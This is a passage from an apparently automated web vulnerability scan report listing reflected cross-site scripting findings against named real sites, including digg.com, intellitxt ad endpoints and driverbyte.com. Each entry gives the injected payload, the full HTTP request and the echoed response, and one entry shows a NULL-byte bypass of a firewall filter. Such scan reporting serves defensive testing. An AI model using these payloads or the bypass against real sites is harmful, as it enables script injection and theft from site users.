Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af36"><script>alert(1)</script>770fc1d9d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af36\"><script>alert(1)</script>770fc1d9d40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?8af36"><script>alert(1)</script>770fc1d9d40=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:04:48 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Sun, 06 Feb 2011 16:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176151

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?8af36\"><script>alert(1)</script>770fc1d9d40=1#preview" method="post">
...[SNIP]...

4.34. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009da6c"><script>alert(1)</script>d18492e2c89 was submitted in the REST URL parameter 1. This input was echoed as 9da6c"><script>alert(1)</script>d18492e2c89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%009da6c"><script>alert(1)</script>d18492e2c89 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 16:01:22 GMT; path=/; domain=digg.com
Set-Cookie: d=3e0917fe7fe8fd0acf4c1eeedf77ce194c85aeb0dd072779f425315961ae5aeb; expires=Sat, 06-Feb-2021 02:09:02 GMT; path=/; domain=.digg.com
X-Digg-Time: D=209054 10.2.129.90
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%009da6c"><script>alert(1)</script>d18492e2c89.rss">
...[SNIP]...

4.35. http://download32.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c219f%3balert(1)//7aec04d590a was submitted in the jscallback parameter. This input was echoed as c219f;alert(1)//7aec04d590a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19c219f%3balert(1)//7aec04d590a HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:31 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Sat, 05 Feb 2011 22:24:31 GMT
Connection: close

try{$iTXT.js.callback19c219f;alert(1)//7aec04d590a();}catch(e){}

4.36. http://download32.us.intellitxt.com/iframescript.jsp [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646d"><script>alert(1)</script>a066d7a2f43 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0f646d"><script>alert(1)</script>a066d7a2f43 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 225
Date: Sat, 05 Feb 2011 22:24:19 GMT
Connection: close

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2773,2770,2765,2794,2792,2795,2763,2764&type=script&ipid=18400&sfid=0f646d"><script>alert(1)</script>a066d7a2f43" language="javascript">
...[SNIP]...

4.37. http://download32.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24d8b'-alert(1)-'5f3e446269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=18400&24d8b'-alert(1)-'5f3e446269e=1 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:14 GMT
Connection: close
Content-Length: 10714

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
;_qoptions={tags:"721.8541.18400"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://download32.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18400&24d8b'-alert(1)-'5f3e446269e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.38. http://download32.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11ac3%3balert(1)//b19114a24fd was submitted in the jscallback parameter. This input was echoed as 11ac3;alert(1)//b19114a24fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1296942500943&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=12%2C6%2C18&jscallback=$iTXT.js.callback1811ac3%3balert(1)//b19114a24fd HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:31 GMT
Connection: close
Content-Length: 13687

(function(){var nh = new $iTXT.ui.Hook({value: "windows xp",uid: "4CE10DDD0B464E3594F4EBCDDB622BF1",uidh: "b33b1a94dd4778a9dbf40e8a55fbd665",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.t
...[SNIP]...
track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19828494,'windows vista','http://pixel.intellitxt.com/pixel.jsp?id=2794&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback1811ac3;alert(1)//b19114a24fd();}catch(e){}

4.39. http://download32.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be98b%3balert(1)//513baa1609f was submitted in the jscallback parameter. This input was echoed as be98b;alert(1)//513baa1609f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1296942497719&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=12%2C6%2C18&pagecl=16914&jsoncl=16099&ppc=-1&hn=96&chunkkey=18400:57f4673cf4ad79544ac753cf0dd004c8:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Interactive%20DNS%20Query%20is%20a%20program%20designed%20to%20allow%20you%20to%20perform%20a%20query%20of%20DNS%20records.%20It%20is%20similar%20to%20the%20unix%20%5C%22dig%5C%22%20or%20%5C%22nslookup%5C%22%20commands%2C%20and%20uses%20a%20convenient%20GUI%20interface.%20Interactive%20DNS%20Query%20allows%20you%20to%20query%20for%20all%20types%20of%20DNS%20records%2C%20including%20A%2C%20MX%2C%20TXT%2C%20NS%2C%20etc.%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22522.0%20KB%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22Freeware%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22Windows%2095%2C%20Windows%2098%2C%20Windows%20Me%2C%20Windows%20NT%2C%20Windows%20XP%2C%20Windows%202000%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22The%20kick'n%20TCP%2FIP%20diagnostic%20toolkit%20-%20cool%20tools%20for%20network%20troubleshooting.%20Includes%20GeoRoute%20(a%20geographical%20trace%20route%20displayed%20on%20a%20world%20map)%2C%20iSpeed%20(an%20Internet%20speed%20tester%20whic&chunk=0&total=17&jscallback=$iTXT.js.callback1be98b%3balert(1)//513baa1609f HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Sat, 05 Feb 2011 22:24:25 GMT
Connection: close

try{$iTXT.js.callback1be98b;alert(1)//513baa1609f();}catch(e){}

4.40. http://download32.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bd0eb%3balert(1)//fa6a87ef4aa was submitted in the jscallback parameter. This input was echoed as bd0eb;alert(1)//fa6a87ef4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0bd0eb%3balert(1)//fa6a87ef4aa HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:21 GMT
Connection: close
Content-Length: 19890

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0bd0eb;alert(1)//fa6a87ef4aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.41. http://download32.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download32.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4db"-alert(1)-"99b36b51f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0&7f4db"-alert(1)-"99b36b51f6a=1 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 22:24:23 GMT
Connection: close
Content-Length: 19871

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
ozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","7f4db"-alert(1)-"99b36b51f6a":"1","reg":"tx","refurl":"http://www.download32.com/nslookup-software.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new
...[SNIP]...

4.42. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 was submitted in the REST URL parameter 1. This input was echoed as 2f79e<img src=a onerror=alert(1)>26b55a1d1b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:58 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:58 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<b>download ga 81845gv gigabyte vga driver2f79e<img src=a onerror=alert(1)>26b55a1d1b2</b>
...[SNIP]...

4.43. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 was submitted in the REST URL parameter 1. This input was echoed as 72968\"><img src=a onerror=alert(1)>a36cb148e37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:52 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:52 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<meta name="description" content="download ga 81845gv gigabyte vga driver72968\"><img src=a onerror=alert(1)>a36cb148e37 free drivers downloads: GIGABYTE GA-7VA Bios (Rev 2.0) 1.1 and other" />
...[SNIP]...

4.44. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8ed7<img src=a onerror=alert(1)>ec91bc08206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206=1 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:42 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:42 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
